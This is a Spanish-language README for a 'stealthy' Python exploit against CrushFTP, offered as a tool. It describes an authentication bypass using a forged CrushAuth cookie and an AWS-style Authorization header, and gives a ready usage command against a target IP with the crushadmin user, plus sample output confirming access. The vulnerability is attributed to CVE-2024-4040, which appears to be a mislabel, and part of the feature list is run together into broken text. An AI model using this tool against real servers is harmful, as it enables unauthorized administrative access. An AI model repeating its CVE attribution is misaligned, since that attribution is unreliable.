
Exploit para CVE-2024-4040 – Bypass de autenticación en CrushFTP mediante la cookie CrushAuth y suplantación de cabeceras estilo AWS. PoC sigiloso en Python con generación segura de tokens, bypass de SSL y salida mejorada.
Este repositorio contiene un exploit sigiloso de prueba de concepto (PoC) en Python para CVE-2024-4040, una vulnerabilidad crítica en CrushFTP (v10 y anteriores) que permite a un atacante omitir la autenticación mediante una cookie CrushAuth falsificada y una cabecera Authorization de estilo AWS.
Un atacante no autenticado puede omitir la autenticación en instancias vulnerables de CrushFTP creando una combinación específica de cookie/cabecera, obteniendo acceso no autorizado a funciones web internas.
CrushAuth mediante secretsAuthorization falsificada válida de estilo AWSrequests)python3 CVE-2024-4040.py http://target-ip:8080 --valid_username crushadmin
target_url — URL base del servidor CrushFTP
--valid_username — Usuario válido conocido (por defecto: crushadmin)
🔍 Ejemplo de salida
[*] CrushFTP Authentication Bypass Exploit
[*] Targeting: http://192.168.1.10:8080
[*] Using username: crushadmin
[+] Exploit Result:
Status_Code : 200
Response_Text : {"getUserNameResponse":{"user_name":"crushadmin"}}
[+] CrushFTP Server is VULNERABLE!
Este código es únicamente para fines educativos y de pruebas de seguridad autorizadas. No lo utilices contra sistemas que no poseas o para los que no tengas permiso explícito de prueba.
Refactor del PoC: illdeed